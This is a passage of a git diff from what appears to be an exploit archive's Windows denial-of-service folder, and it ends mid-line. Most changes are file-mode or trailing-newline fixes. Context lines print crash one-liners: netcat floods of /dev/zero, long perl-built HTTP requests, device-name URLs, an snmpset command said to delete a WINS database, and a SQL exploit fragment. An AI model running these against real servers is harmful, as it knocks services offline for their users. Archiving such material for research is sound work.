--git a/platforms/windows/dos/19974.c b/platforms/windows/dos/19974.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19986.txt b/platforms/windows/dos/19986.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19994.c b/platforms/windows/dos/19994.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20005.c b/platforms/windows/dos/20005.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20006.nasl b/platforms/windows/dos/20006.nasl old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2001.c b/platforms/windows/dos/2001.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20015.txt b/platforms/windows/dos/20015.txt old mode 100755 new mode 100644 index 53cfd8e16..0aa038136 --- a/platforms/windows/dos/20015.txt +++ b/platforms/windows/dos/20015.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1349/info If a long url is sent to port 80 on a SimpleServer WWW 1.05 it could cause the service to stop responding. A restart of the server service is required inorder to regain normal functionality. -http://target/cgi-bin/long_string_here \ No newline at end of file +http://target/cgi-bin/long_string_here \ No newline at end of file diff --git a/platforms/windows/dos/20016.py b/platforms/windows/dos/20016.py index 1d5c08b13..8dfc586f1 100755 --- a/platforms/windows/dos/20016.py +++ b/platforms/windows/dos/20016.py @@ -25,5 +25,4 @@ from ftplib import FTP ftp = FTP('xxx.xxx.xxx.xxx') # Replace x's with ip ftp.login('A' * 16500) -ftp.quit() - \ No newline at end of file +ftp.quit() \ No newline at end of file diff --git a/platforms/windows/dos/20017.py b/platforms/windows/dos/20017.py index 5478f4896..1fe96a3b1 100755 --- a/platforms/windows/dos/20017.py +++ b/platforms/windows/dos/20017.py @@ -19,5 +19,4 @@ import httplib h = httplib.HTTP('xxx.xxx.xxx.xxx') #replace x's with ip h.putrequest('GET', 'A' * 65000) -#end - \ No newline at end of file +#end \ No newline at end of file diff --git a/platforms/windows/dos/20020.txt b/platforms/windows/dos/20020.txt old mode 100755 new mode 100644 index 1b45e030b..60f1602a5 --- a/platforms/windows/dos/20020.txt +++ b/platforms/windows/dos/20020.txt @@ -17,4 +17,4 @@ quit +OK . quit -+OK <username> <target> POP Server signing off (mailbox empty) \ No newline at end of file ++OK <username> <target> POP Server signing off (mailbox empty) \ No newline at end of file diff --git a/platforms/windows/dos/20039.java b/platforms/windows/dos/20039.java old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20047.txt b/platforms/windows/dos/20047.txt old mode 100755 new mode 100644 index cc003e927..5bacb3ad1 --- a/platforms/windows/dos/20047.txt +++ b/platforms/windows/dos/20047.txt @@ -4,4 +4,4 @@ Microsoft Windows 2000 Server comes with a telnet server to provide remote conso An attacker can exploit this issue using netcat under Linux: -nc target.host 23 < /dev/zero \ No newline at end of file +nc target.host 23 < /dev/zero \ No newline at end of file diff --git a/platforms/windows/dos/20049.txt b/platforms/windows/dos/20049.txt old mode 100755 new mode 100644 index ed0ea4419..2b93b4f57 --- a/platforms/windows/dos/20049.txt +++ b/platforms/windows/dos/20049.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/1416/info The Check Point Firewall-1 SMTP Security Server in Firewall-1 4.0 and 4.1 on Windows NT is vulnerable to a simple network-based attack which can increase the firewall's CPU utilization to 100%. Sending a stream of binary zeros (or other invalid SMTP commands) to the SMTP port on the firewall raises the target system's load to 100% while the load on the attacker's machine remains relatively low. According to Check Point Software this only disables mail relay while allowing other firewall operations to continue normally. -This can easily be reproduced from a Linux system using netcat with an input of /dev/zero, with a command such as "nc firewall 25 < /dev/zero". \ No newline at end of file +This can easily be reproduced from a Linux system using netcat with an input of /dev/zero, with a command such as "nc firewall 25 < /dev/zero". \ No newline at end of file diff --git a/platforms/windows/dos/20051.c b/platforms/windows/dos/20051.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20054.pl b/platforms/windows/dos/20054.pl index 8fca8cfbe..199bc9524 100755 --- a/platforms/windows/dos/20054.pl +++ b/platforms/windows/dos/20054.pl @@ -34,4 +34,4 @@ print S "$buf"; print("Data has been successfully sent to $serv\n"); -sub usage {die("\n\n$0 -s <server>\n\n");} \ No newline at end of file +sub usage {die("\n\n$0 -s <server>\n\n");} \ No newline at end of file diff --git a/platforms/windows/dos/20080.c b/platforms/windows/dos/20080.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20094.txt b/platforms/windows/dos/20094.txt old mode 100755 new mode 100644 index 2932e2bf7..63f6d1d1d --- a/platforms/windows/dos/20094.txt +++ b/platforms/windows/dos/20094.txt @@ -5,4 +5,4 @@ The M3U Playlist file parser in NullSoft Winamp does not perform proper bounds c Cut and paste the following into a M3U file: EXTM3U -#EXTINF:<string of of over 280 characters> \ No newline at end of file +#EXTINF:<string of of over 280 characters> \ No newline at end of file diff --git a/platforms/windows/dos/20099.c b/platforms/windows/dos/20099.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20219.txt b/platforms/windows/dos/20219.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20233.txt b/platforms/windows/dos/20233.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20254.txt b/platforms/windows/dos/20254.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20255.txt b/platforms/windows/dos/20255.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20289.txt b/platforms/windows/dos/20289.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20295.txt b/platforms/windows/dos/20295.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20304.txt b/platforms/windows/dos/20304.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20307.txt b/platforms/windows/dos/20307.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20310.txt b/platforms/windows/dos/20310.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20311.c b/platforms/windows/dos/20311.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2037.c b/platforms/windows/dos/2037.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20379.txt b/platforms/windows/dos/20379.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2039.pl b/platforms/windows/dos/2039.pl index e67673948..8248d04a2 100755 --- a/platforms/windows/dos/2039.pl +++ b/platforms/windows/dos/2039.pl @@ -35,5 +35,4 @@ do } } while (true); -# milw0rm.com [2006-07-20] - \ No newline at end of file +# milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/windows/dos/20403.txt b/platforms/windows/dos/20403.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20432.txt b/platforms/windows/dos/20432.txt old mode 100755 new mode 100644 index 0e0277109..b19999b26 --- a/platforms/windows/dos/20432.txt +++ b/platforms/windows/dos/20432.txt @@ -4,4 +4,4 @@ Network Associates WebShield SMTP is an email virus scanner designed for interne In the event that WebShield SMTP receives an outgoing email containing six "%20" followed by any character within the recipient field, the application will crash, resulting in an access violation error upon processing of the email. Restarting WebShield SMTP is required in order to regain normal functionality. It has been unverified as to whether or not arbitrary code can be executed on the target system if specially crafted code is inserted into the buffer. -recipient@f%20f%20f%20f%20f%20f%20f \ No newline at end of file +recipient@f%20f%20f%20f%20f%20f%20f \ No newline at end of file diff --git a/platforms/windows/dos/20437.c b/platforms/windows/dos/20437.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20440.irc b/platforms/windows/dos/20440.irc old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20470.txt b/platforms/windows/dos/20470.txt old mode 100755 new mode 100644 index 65bc0618e..8917a7811 --- a/platforms/windows/dos/20470.txt +++ b/platforms/windows/dos/20470.txt @@ -9,4 +9,4 @@ connect reset; connect to sample user db2admin using db2admin; select * from employee where year(birthdate)=1999 and firstnme<''; -It is not known what the cause for this behaviour is. Restarting the application is required in order to regain normal functionality. \ No newline at end of file +It is not known what the cause for this behaviour is. Restarting the application is required in order to regain normal functionality. \ No newline at end of file diff --git a/platforms/windows/dos/20484.txt b/platforms/windows/dos/20484.txt old mode 100755 new mode 100644 index ba48ec224..b20c683b6 --- a/platforms/windows/dos/20484.txt +++ b/platforms/windows/dos/20484.txt @@ -21,4 +21,4 @@ Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and -get that file via HTTP with a separate request). \ No newline at end of file +get that file via HTTP with a separate request). \ No newline at end of file diff --git a/platforms/windows/dos/20508.txt b/platforms/windows/dos/20508.txt old mode 100755 new mode 100644 index 4444eef13..c33a6b0c9 --- a/platforms/windows/dos/20508.txt +++ b/platforms/windows/dos/20508.txt @@ -7,4 +7,4 @@ Quoted from a Microsoft FAQ, "Point-to-Point-Tunneling Protocol (PPTP) is a new hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhh (256 characters) -3) ctrl-d \ No newline at end of file +3) ctrl-d \ No newline at end of file diff --git a/platforms/windows/dos/20515.txt b/platforms/windows/dos/20515.txt old mode 100755 new mode 100644 index 09357b907..546af4b5b --- a/platforms/windows/dos/20515.txt +++ b/platforms/windows/dos/20515.txt @@ -12,4 +12,4 @@ Exploitation of this vulnerability could be more serious with repeated attacks. 2. Menu->Connect->Remote System=127.0.0.1 , Port=1026 3. Press 'Connect' button 4. When it is connects, type some random characters and press enter. -5. Close telnet.exe. \ No newline at end of file +5. Close telnet.exe. \ No newline at end of file diff --git a/platforms/windows/dos/20518.txt b/platforms/windows/dos/20518.txt old mode 100755 new mode 100644 index e40b7a496..730b27e65 --- a/platforms/windows/dos/20518.txt +++ b/platforms/windows/dos/20518.txt @@ -7,4 +7,4 @@ Unfortunately Interchange is subject to a denial of service. By requesting a mal This vulnerability may be the result of a buffer overflow, although not verified this could lead to the execution of arbitrary code on the target host. telnet victim 80 -POST (963+ bytes) HTTP/1.0 \ No newline at end of file +POST (963+ bytes) HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/dos/20552.html b/platforms/windows/dos/20552.html old mode 100755 new mode 100644 index 8faa236e7..719bbb52e --- a/platforms/windows/dos/20552.html +++ b/platforms/windows/dos/20552.html @@ -13,4 +13,4 @@ test.document.open(); // Stream data test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>"); delete Larholm; Larholm = {}; // Crash -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/20564.txt b/platforms/windows/dos/20564.txt old mode 100755 new mode 100644 index fcaf46ed8..568e84b3b --- a/platforms/windows/dos/20564.txt +++ b/platforms/windows/dos/20564.txt @@ -7,4 +7,4 @@ The Simple Network Management Protocol (SNMP) provides remote network administra snmp-set-requests, my sample exploit was done using the CMU SNMP development kit under Unix. The command "rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2" -successfully entirely deleted my WINS database." \ No newline at end of file +successfully entirely deleted my WINS database." \ No newline at end of file diff --git a/platforms/windows/dos/2057.c b/platforms/windows/dos/2057.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20589.c b/platforms/windows/dos/20589.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20596.c b/platforms/windows/dos/20596.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20613.txt b/platforms/windows/dos/20613.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20634.txt b/platforms/windows/dos/20634.txt old mode 100755 new mode 100644 index c94c75e30..57870b68c --- a/platforms/windows/dos/20634.txt +++ b/platforms/windows/dos/20634.txt @@ -7,4 +7,4 @@ Pi3Web has also been known to disclose the physical path to the web root by requ http://target/isapi/tstisapi.dll?[a lot of 'A's] -http://localhost/[any string which causes a 404 error] \ No newline at end of file +http://localhost/[any string which causes a 404 error] \ No newline at end of file diff --git a/platforms/windows/dos/20641.txt b/platforms/windows/dos/20641.txt old mode 100755 new mode 100644 index 558f9adcf..12008e96e --- a/platforms/windows/dos/20641.txt +++ b/platforms/windows/dos/20641.txt @@ -6,4 +6,4 @@ Requesting a specially crafted URL composed of 284 or more bytes, will cause the A restart of the server is required in order to gain normal functionality. -http://target/ext.dll?aaaaa(x 248 bytes) \ No newline at end of file +http://target/ext.dll?aaaaa(x 248 bytes) \ No newline at end of file diff --git a/platforms/windows/dos/20650.txt b/platforms/windows/dos/20650.txt old mode 100755 new mode 100644 index 2d9185e57..c4ed85ede --- a/platforms/windows/dos/20650.txt +++ b/platforms/windows/dos/20650.txt @@ -6,4 +6,4 @@ A problem with the software could allow a denial of service to legitimate users. It is possible for a malicious remote user may take advantage of this vulnerability to deny service to legitimate users. -echo "GET " `perl -e 'print "A" x 666'` | telnet 192.168.0.20 80 \ No newline at end of file +echo "GET " `perl -e 'print "A" x 666'` | telnet 192.168.0.20 80 \ No newline at end of file diff --git a/platforms/windows/dos/20655.txt b/platforms/windows/dos/20655.txt old mode 100755 new mode 100644 index 9b61609b6..5cc88e76a --- a/platforms/windows/dos/20655.txt +++ b/platforms/windows/dos/20655.txt @@ -6,4 +6,4 @@ The attacker could submit a specially crafted GET request via a telnet connectio A restart of the server is required to gain normal functionality. -echo "GET A" | telnet target \ No newline at end of file +echo "GET A" | telnet target \ No newline at end of file diff --git a/platforms/windows/dos/20656.txt b/platforms/windows/dos/20656.txt old mode 100755 new mode 100644 index 9e3ab1609..ffccdd9a4 --- a/platforms/windows/dos/20656.txt +++ b/platforms/windows/dos/20656.txt @@ -6,4 +6,4 @@ Submitting a specially crafted request via a telnet connection, could cause the A restart of the server is required in order to gain normal functionality. -echo `perl -e 'print "A" x 1000'` | telnet target \ No newline at end of file +echo `perl -e 'print "A" x 1000'` | telnet target \ No newline at end of file diff --git a/platforms/windows/dos/20662.txt b/platforms/windows/dos/20662.txt old mode 100755 new mode 100644 index 1c70ebeae..a08e312fb --- a/platforms/windows/dos/20662.txt +++ b/platforms/windows/dos/20662.txt @@ -6,4 +6,4 @@ A problem in the handling of HTTP GET requests could allow a remote user to deny It is therefore possible for a malicious remote user to connect to the server and request a long file name, crashing the server, and resulting in a denial of service attack. -echo "GET " `perl -e 'print "A" x 80000'` | nc vulnerable.server 80 \ No newline at end of file +echo "GET " `perl -e 'print "A" x 80000'` | nc vulnerable.server 80 \ No newline at end of file diff --git a/platforms/windows/dos/20664.pl b/platforms/windows/dos/20664.pl index 18426bee2..d9e0125ec 100755 --- a/platforms/windows/dos/20664.pl +++ b/platforms/windows/dos/20664.pl @@ -38,4 +38,4 @@ close $socket; do vv(128008,"V"); # may need to change the length sleep(1); do vv(128008,"V"); -print "Done.\n"; \ No newline at end of file +print "Done.\n"; \ No newline at end of file diff --git a/platforms/windows/dos/20681.c b/platforms/windows/dos/20681.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20682.txt b/platforms/windows/dos/20682.txt old mode 100755 new mode 100644 index 3f696342a..2668421fc --- a/platforms/windows/dos/20682.txt +++ b/platforms/windows/dos/20682.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2468/info A denial of service condition exists in Michael Lamont Savant web server. Requesting a specially crafted URL composed of '%' characters could cause the server to stop responding. -www.target/%%% \ No newline at end of file +www.target/%%% \ No newline at end of file diff --git a/platforms/windows/dos/20696.txt b/platforms/windows/dos/20696.txt old mode 100755 new mode 100644 index cc9d1d004..23a93e333 --- a/platforms/windows/dos/20696.txt +++ b/platforms/windows/dos/20696.txt @@ -6,4 +6,4 @@ A successfully logged-in user, via IMAP, could cause MDaemon to terminate the co 1 LOGIN JOE PASSWORD * OK LOGIN completed -1 SELECT AAAAAAA.... \ No newline at end of file +1 SELECT AAAAAAA.... \ No newline at end of file diff --git a/platforms/windows/dos/20728.txt b/platforms/windows/dos/20728.txt old mode 100755 new mode 100644 index 00be5bf44..3efe55c1a --- a/platforms/windows/dos/20728.txt +++ b/platforms/windows/dos/20728.txt @@ -8,4 +8,4 @@ GET / HTTP/1.1 Proxy-Authorization:AAAAAAAAAAAAA..... Where A x 1033 or more characters, as long as its -over 1032, it will work. \ No newline at end of file +over 1032, it will work. \ No newline at end of file diff --git a/platforms/windows/dos/20763.c b/platforms/windows/dos/20763.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20770.txt b/platforms/windows/dos/20770.txt old mode 100755 new mode 100644 index 2028b6453..e6ff978d6 --- a/platforms/windows/dos/20770.txt +++ b/platforms/windows/dos/20770.txt @@ -8,4 +8,4 @@ Therefore, it is possible for a remote user to deny service to legitimate users telnet web.server 80 GET /aux -then hit return twice \ No newline at end of file +then hit return twice \ No newline at end of file diff --git a/platforms/windows/dos/20771.txt b/platforms/windows/dos/20771.txt old mode 100755 new mode 100644 index 73381a8eb..4c4edaa18 --- a/platforms/windows/dos/20771.txt +++ b/platforms/windows/dos/20771.txt @@ -8,4 +8,4 @@ Therefore, it is possible for remote users to deny service to legitimate users o telnet vulnerable.web.server 80 GET /aux -then hit return twice \ No newline at end of file +then hit return twice \ No newline at end of file diff --git a/platforms/windows/dos/20783.txt b/platforms/windows/dos/20783.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20784.cpp b/platforms/windows/dos/20784.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20802.c b/platforms/windows/dos/20802.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20812.c b/platforms/windows/dos/20812.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20814.c b/platforms/windows/dos/20814.c old mode 100755 new mode 100644 index 7cabfd590..f8cedad07 --- a/platforms/windows/dos/20814.c +++ b/platforms/windows/dos/20814.c @@ -139,4 +139,4 @@ return EX_OSERR; printf("Packet sent. Remote machine should be down.\n"); shutdown(mysock, 2); return EX_OK; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/20828.txt b/platforms/windows/dos/20828.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20830.txt b/platforms/windows/dos/20830.txt old mode 100755 new mode 100644 index ef4e9a3c6..dd74d52fc --- a/platforms/windows/dos/20830.txt +++ b/platforms/windows/dos/20830.txt @@ -6,4 +6,4 @@ It is possible to remotely crash a system running Jana Server by submitting a UR A hard reboot of the exploited server will be required to restore web services. -www.example.com/aux \ No newline at end of file +www.example.com/aux \ No newline at end of file diff --git a/platforms/windows/dos/20834.txt b/platforms/windows/dos/20834.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20854.txt b/platforms/windows/dos/20854.txt old mode 100755 new mode 100644 index 14386d09a..150b1759a --- a/platforms/windows/dos/20854.txt +++ b/platforms/windows/dos/20854.txt @@ -10,4 +10,4 @@ LOCK /aaaaaaaaaaaaaaaaaaaaaaaaaa.htw HTTP/1.0 One way is to combine the attack with asp executions, eg. -GET /iisstart.asp?uc=a HTTP/1.0 \ No newline at end of file +GET /iisstart.asp?uc=a HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/dos/20883.txt b/platforms/windows/dos/20883.txt old mode 100755 new mode 100644 index ce115050e..dfa1e02f4 --- a/platforms/windows/dos/20883.txt +++ b/platforms/windows/dos/20883.txt @@ -6,4 +6,4 @@ By submitting a request to the webserver including the 'AUX' MS-DOS device name, The process has to be manually restarted to resume normal operation. -http://www.server.com/aux \ No newline at end of file +http://www.server.com/aux \ No newline at end of file diff --git a/platforms/windows/dos/20917.txt b/platforms/windows/dos/20917.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20930.c b/platforms/windows/dos/20930.c old mode 100755 new mode 100644 index 4b9911076..f415058a5 --- a/platforms/windows/dos/20930.c +++ b/platforms/windows/dos/20930.c @@ -76,5 +76,4 @@ int main(int argc, char *argv[]) return 0; -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/20946.txt b/platforms/windows/dos/20946.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20949.c b/platforms/windows/dos/20949.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20971.txt b/platforms/windows/dos/20971.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20989.txt b/platforms/windows/dos/20989.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/20991.txt b/platforms/windows/dos/20991.txt old mode 100755 new mode 100644 index 90dd2c8a9..471eef677 --- a/platforms/windows/dos/20991.txt +++ b/platforms/windows/dos/20991.txt @@ -4,4 +4,4 @@ Microsoft IIS is prone to denial of service attacks by remote attackers. This ca The end result of exploiting this vulnerability is that the server will crash and a denial of services will occur. The affected services must be restarted to regain normal functionality. -http://host.int/scripts/script.asp?script=com1 \ No newline at end of file +http://host.int/scripts/script.asp?script=com1 \ No newline at end of file diff --git a/platforms/windows/dos/21006.txt b/platforms/windows/dos/21006.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21016.c b/platforms/windows/dos/21016.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21040.txt b/platforms/windows/dos/21040.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21047.txt b/platforms/windows/dos/21047.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21099.c b/platforms/windows/dos/21099.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21123.txt b/platforms/windows/dos/21123.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21131.txt b/platforms/windows/dos/21131.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21147.txt b/platforms/windows/dos/21147.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21170.txt b/platforms/windows/dos/21170.txt old mode 100755 new mode 100644 index 7995b6486..a689cf6f8 --- a/platforms/windows/dos/21170.txt +++ b/platforms/windows/dos/21170.txt @@ -6,4 +6,4 @@ Red Faction allows up to 32 players to game across a LAN or TCP/IP. Both the Red The following example is sufficient to crash Red Faction: -nmap -sU -p 7755 <ip> \ No newline at end of file +nmap -sU -p 7755 <ip> \ No newline at end of file diff --git a/platforms/windows/dos/21171.c b/platforms/windows/dos/21171.c old mode 100755 new mode 100644 index 1bf77331e..813cc31f4 --- a/platforms/windows/dos/21171.c +++ b/platforms/windows/dos/21171.c @@ -492,5 +492,4 @@ int main(int argc, char **argv){ return(1); -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/21174.c b/platforms/windows/dos/21174.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21175.c b/platforms/windows/dos/21175.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21177.txt b/platforms/windows/dos/21177.txt old mode 100755 new mode 100644 index 1ae8f56cb..f991fc5dc --- a/platforms/windows/dos/21177.txt +++ b/platforms/windows/dos/21177.txt @@ -16,4 +16,4 @@ User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Content-Length: 5300643 -Authorization: Basic \ No newline at end of file +Authorization: Basic \ No newline at end of file diff --git a/platforms/windows/dos/21228.c b/platforms/windows/dos/21228.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2124.php b/platforms/windows/dos/2124.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21240.txt b/platforms/windows/dos/21240.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21245.c b/platforms/windows/dos/21245.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21246.c b/platforms/windows/dos/21246.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21305.c b/platforms/windows/dos/21305.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21306.c b/platforms/windows/dos/21306.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21307.txt b/platforms/windows/dos/21307.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21326.txt b/platforms/windows/dos/21326.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21333.txt b/platforms/windows/dos/21333.txt old mode 100755 new mode 100644 index 4c70b3252..988ad5818 --- a/platforms/windows/dos/21333.txt +++ b/platforms/windows/dos/21333.txt @@ -22,4 +22,4 @@ characters for each word to add as a screenname and a groupname, the instances should be 11 for the screenname and 10 for the groupname 6- A memory dump will occurs as soon as the hyperlink is clicked by -either side (You or your buddy). \ No newline at end of file +either side (You or your buddy). \ No newline at end of file diff --git a/platforms/windows/dos/21336.txt b/platforms/windows/dos/21336.txt old mode 100755 new mode 100644 index fe7156671..83051d90e --- a/platforms/windows/dos/21336.txt +++ b/platforms/windows/dos/21336.txt @@ -9,4 +9,4 @@ The webserver will need to be restarted to regain normal functionality. This issue was reported for v2.10 of Xerver. Earlier versions may also be affected. -printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn 127.0.0.1 32123 \ No newline at end of file +printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn 127.0.0.1 32123 \ No newline at end of file diff --git a/platforms/windows/dos/21346.html b/platforms/windows/dos/21346.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21366.txt b/platforms/windows/dos/21366.txt old mode 100755 new mode 100644 index e4df8d0fd..a2f843613 --- a/platforms/windows/dos/21366.txt +++ b/platforms/windows/dos/21366.txt @@ -13,4 +13,4 @@ Dim i for i=1 to 100 Set a = CreateObject("Word.Application") Next -</SCRIPT> \ No newline at end of file +</SCRIPT> \ No newline at end of file diff --git a/platforms/windows/dos/21387.txt b/platforms/windows/dos/21387.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21388.c b/platforms/windows/dos/21388.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21389.txt b/platforms/windows/dos/21389.txt old mode 100755 new mode 100644 index 7cf8f5377..d41aa72f7 --- a/platforms/windows/dos/21389.txt +++ b/platforms/windows/dos/21389.txt @@ -5,4 +5,4 @@ An issue has been discovered in Windows 2000, which could cause a denial of syst Submitting malformed data to port 445 could cause the Lanman service to consume high CPU and Kernel mode memory usage. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21389.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21389.tar.gz \ No newline at end of file diff --git a/platforms/windows/dos/214.c b/platforms/windows/dos/214.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21404.htm b/platforms/windows/dos/21404.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21416.txt b/platforms/windows/dos/21416.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21419.txt b/platforms/windows/dos/21419.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21429.c b/platforms/windows/dos/21429.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21432.txt b/platforms/windows/dos/21432.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21471.c b/platforms/windows/dos/21471.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21481.txt b/platforms/windows/dos/21481.txt old mode 100755 new mode 100644 index b5680a676..0d4dda207 --- a/platforms/windows/dos/21481.txt +++ b/platforms/windows/dos/21481.txt @@ -14,4 +14,4 @@ Application-URL: http://www.microsoft.com Invitation-Command: INVITE Invitation-Cookie: 54902160%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 -Session-ID: {8B1BE64F-4019-489D-B1A3-EC0BA993651B} \ No newline at end of file +Session-ID: {8B1BE64F-4019-489D-B1A3-EC0BA993651B} \ No newline at end of file diff --git a/platforms/windows/dos/21498.c b/platforms/windows/dos/21498.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21536.jsp b/platforms/windows/dos/21536.jsp old mode 100755 new mode 100644 index 9417c6b39..7a26d7e2f --- a/platforms/windows/dos/21536.jsp +++ b/platforms/windows/dos/21536.jsp @@ -26,4 +26,4 @@ new WPrinterJob().pageSetup(null,null); %> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/dos/21540.txt b/platforms/windows/dos/21540.txt old mode 100755 new mode 100644 index 9658adc0c..ffdf251be --- a/platforms/windows/dos/21540.txt +++ b/platforms/windows/dos/21540.txt @@ -10,4 +10,4 @@ This issue has been reported to exist in SQL Server 2000 Gold, other versions ma IIS-Server/Nwind/Template/catalog.xml?contenttype=text/AAAA...AAA -This uses a 'template' file instead of a direct query to cause inetinfo.exe to crash. \ No newline at end of file +This uses a 'template' file instead of a direct query to cause inetinfo.exe to crash. \ No newline at end of file diff --git a/platforms/windows/dos/21556.txt b/platforms/windows/dos/21556.txt old mode 100755 new mode 100644 index cf5b5ed52..827e73179 --- a/platforms/windows/dos/21556.txt +++ b/platforms/windows/dos/21556.txt @@ -5,4 +5,4 @@ A problem with Microsoft Internet Explorer may make it possible to deny service It may be possible to crash IE. When IE encounters a style sheet with the p{cssText} element declared, and a font weight of bold is specified, the browser crashes. This could be used as a denial of service attack. -<style>p{cssText: font-weight: bold;}</style> \ No newline at end of file +<style>p{cssText: font-weight: bold;}</style> \ No newline at end of file diff --git a/platforms/windows/dos/21569.txt b/platforms/windows/dos/21569.txt old mode 100755 new mode 100644 index 9834b75d0..c847ef93f --- a/platforms/windows/dos/21569.txt +++ b/platforms/windows/dos/21569.txt @@ -65,4 +65,4 @@ select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions' exec (@exploit) -------->8--------- \ No newline at end of file +------->8--------- \ No newline at end of file diff --git a/platforms/windows/dos/2160.c b/platforms/windows/dos/2160.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/21600.txt 